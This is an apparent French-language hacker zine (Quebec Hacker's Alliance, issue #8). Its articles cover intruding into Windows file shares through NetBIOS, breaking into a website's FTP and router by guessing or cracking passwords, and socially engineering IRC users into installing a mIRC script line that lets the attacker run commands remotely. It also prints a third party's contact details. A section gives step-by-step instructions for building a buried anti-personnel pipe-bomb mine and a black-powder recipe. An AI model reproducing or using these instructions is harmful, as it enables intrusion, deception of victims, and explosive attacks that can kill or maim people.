nbtstat -A ipdelavictime, un tableau devrait apparaitre, si il y a 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ms du même type UNIQUE, son PC est hackable, sinon vous l'avez dans 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eme eta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ditez un fichier qui devra s'appeler lmhost, vous y noterez vos victimes,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yntaxe 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pdelavictime (tapez une tabulation) nomdelamachine (tapez une tabul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x : 126.235.55.78 bob #P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eme éta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apez sur la ligne de commande nbtstat -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suite cliquez sur démarrer-&gt;rechercher-&gt;ordinateur... et entrez le nom de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chine de la victime. Maintenant si la victime partage des fichiers v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urrez en faire ce que vous voul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S SITES WEB par th[|}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site que nous prendrons comme exemple sera hacker.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 première chose à faire, avant de ce mettre à cette tâche ardue, est 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érifier que l'on a le "matériel nécessaire", ce qui revient à d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eln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DOS et les tracert, ping, et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Un crackpass (puiss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S_PINGPR (de préfér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Une connaissance sous Linux ou Unix (ou même aucu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L'url du site à pirater (ça parait bénin, mais...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ur commencer il faut obtenir le maximum d'infos sur le site et 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épertorier sur un carnet ou sur une feuille: elles sont nombreu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voir l'url du site, son adresse IP et TCP: pour avoir ces infos aller sous do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aper (les "&gt;" ne devant pas être écr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t; tracert www.hacker.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TRE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Vous n'avez pas l'adresse TCP du site, vu qu'il n'en a pas. L'adresse IP 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9.195.130.8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Les infos sur les utilisateurs (grâce à WS_PINGP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dministrative Contact, Technical Contact, Zone Contact:Beckett, Jod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B11383) jodi@NAUTICOM.N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12-449-4600 (FAX) 412-449-465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illing Contact:Beckett, Jodi (JB11383) jodi@NAUTICOM.N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412-449-4600 (FAX) 412-449-465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Ensuite essayez (ce n'est pas le cas pour ce site), essayez sur le navigate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tp://www.nomdusite.com ou ftp://ftp.nomdusite.com. ensuite vous cherch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 rubrique password, si l'accès aux ftp par ce chemin n'est pas protég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re). cette rubrique password vous donnera les password pour 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tilisateurs, sinon par défaut sortez votre crackpass... mais dans quel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ditions doit dont mettre un nom d'utilisateur et un password, et où?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rra ça un peu aprè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Puis accéder aux autres adresses IP qui sont les plus proches du site. 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isant un tracert, l'adresse juste au dessus du site, vous donne l'adresse d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ooter du site. Vous prenez son adresse IP ou TCP, vous prenez Telnet et v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ntrez l'adresse IP. Vous voilà connecté au rooter par telnet. On v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mandera le nom d'utilisateur et son passwo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ilà! ca c'est pour le démarrage! Ensuite... Vous allez sous DOS et v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îtes (les "&gt;" ne devant pas être écr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t; ft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t; op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t; www.hacker.c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vous demandera un nom d'user. Vous pouvez rentrer en anonymous si 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rveur le permet, et télécharger les pages, mais ce ne sera pas du hack, j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us dis comment fa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rentrez comme nom d'user: anonymous, ensuite vous tapez n'importe qu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ssword et vous tapez: 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nc vous regardez les infos obtenus avec WS_PINGPR et vous ave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lusieurs noms qui vous sont donnés: Beckett et Jod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essayez les 2 noms d'utilisateurs et vous remarquez que "Jodi" répo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rès bien! vous venez de faire la moitié: vous avez trouvez un nom d'user, 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faut maintenant le password... Inutile de vous casser la tête! Si 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ersonne est prudente vous n'avez aucune chance de le trouver. Sortez vot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illeur Crackpass et essayez. Par défaut rabattez-vous sur le rooter p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elnet. Bonne ch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Pipe-Bomb (complément), par T\\'I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ipe-Bomb (complé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STER (UIN:2268570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vant dallé plus loin, je vous recommande, si ce n'est pas déjà faits, dallé chercher le zine #4 des QHAs. La recette complète si trouve. Même si le non de pikashu aparait, c'est bien moi qui aie écrit cette article comme écrit plus bas. Dans ce complément je donnerai seulement le moyen de fabrication des mines anti-personnelles et une recette "home-made" de poudre no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Mi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beau côté des mines, c'est que c'est quand même plus stable que les bombe a détonnateur au mercure. Il vous faut d'abord un interupteur a pression, comme certain on pour la lumière dans leur chambre (disponible dans toute bonne quincaillerie). Tant qu'à allé à la quincaillerie, achetez donc une batterie 9 volt, si vous avez pas de fils électrique ca va vous en prendre, mais pas beaucoup. Pis après allé au magasin qui vend des modèle reduis acheter des "electric igniter" pour les fusées. Connectez un fil de l'intérupteur à la batterie avec environ 30cm de fil. Un autre fil (15cm), de l'interupteur à une pipe-bombe à détonnateur électrique que vous avez déjà assemblé, et avec un dernier fil (15cm), on relie la bombe à la batterie. votre mine est prête, mais je dois vous avertir qu'il y a un délais avant lexplosion, c'est pouquoi il y a presque 1 pied de fil. Pensez à la direction d'où viendra la victime et placé la bombe, bien enterré, 1 pied plus loin que le détonnateur. Le détonnateur lui ne doit pas être enterré, mais doit tout de même être bien dissimulé.</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Poudre no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côté explosif d'une bombe est toujours le plus important. Peux importe les facons, aussi ingénieuse soit-elle, dont vous l'allumez, ce qui compte c'est qu'elle saute. Cette recette de poudre est la plus commune. Cette fois, allé à la pharmacie plustôt qu'à la quincaillerie. Achetez-y du salpêtre (chlorate de potassium pour le plastic =), et du souffre. Il vous faut aussi du charbon mais tout le monde doit avoir ca. Ensuite, on met 6 parts de potassium, 2 parts de Charnon et 1 part Souffre. Cette recette est aprouvé par 5 de mes amis. lol . Amusez-vous autant qu'eu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 Wasteland-2000 [http://www.surf.to/wastel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IRC Controlling, par Cable-Kill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IRC Controll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r Cable-Kil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jet: Controler quelqu'un a partir de CTC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ur QH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ns cette article tout repose sur la crédibilité...(Social Engene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é le principe des trojans sauf que vous avez pas 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voyer une file.Il faut en quelque sorte infecter la person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us avez a choisir un mot de passe enf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emièrement se trouver une victime qui n'a pas de script MIR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 souvent il y a plusieurs protection et cela devient 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bstac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uxièmement il faut se faire une petite intr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 J'ai entendu parler d'un virus qui cour sur IRC pis j'a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it une petite protection alors je peux te la donn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uvent le monde vous dise arf cé un cros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a aussi les newbies qui sont insécure puis qui vous demande d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nseignements... Alors vous inventé un scenari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Il faut "l'infecter" avec une petite ligne de comman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ors tu lui dit: Voila la protection que j'ai fa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t ca dans ton "Remote Script" en pressant Alt+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tcp 1:un_mot_de_passe_:*:/$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emple: ctcp 1:cmd:*:/$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ubliez surtout pas ce mot de passe car il vous servir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executer des commandes chez votre vic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Pour controller la person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ur controller la personne c'est tout si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and elle est infecter vous faites la comman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tcp le_nick_de_la_victime le_mot_de_passe la_commande_a_execu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emple: /ctcp iga cmd /mode #iga +o CabKil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ctime): IG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ssword): cm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mande): /mode #iga +o CabKil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clu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ubliez pas que tout ca ne pas à tout coup... Cette technique n'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s infailli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ble-Kil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Conclu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rci d'avoir lu le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Zine #8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quebec Hacker's Alli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 Zine #9 devrais suivre assez bientot! :) Garder un oe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r nous pour plus de nouvelles... Allez sur #QHA (under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 sur www.qharulez.com comme vous preféré :) Merc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la procha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b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>QHA, Québec Hacker's Alliance - http//www.qharulez.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>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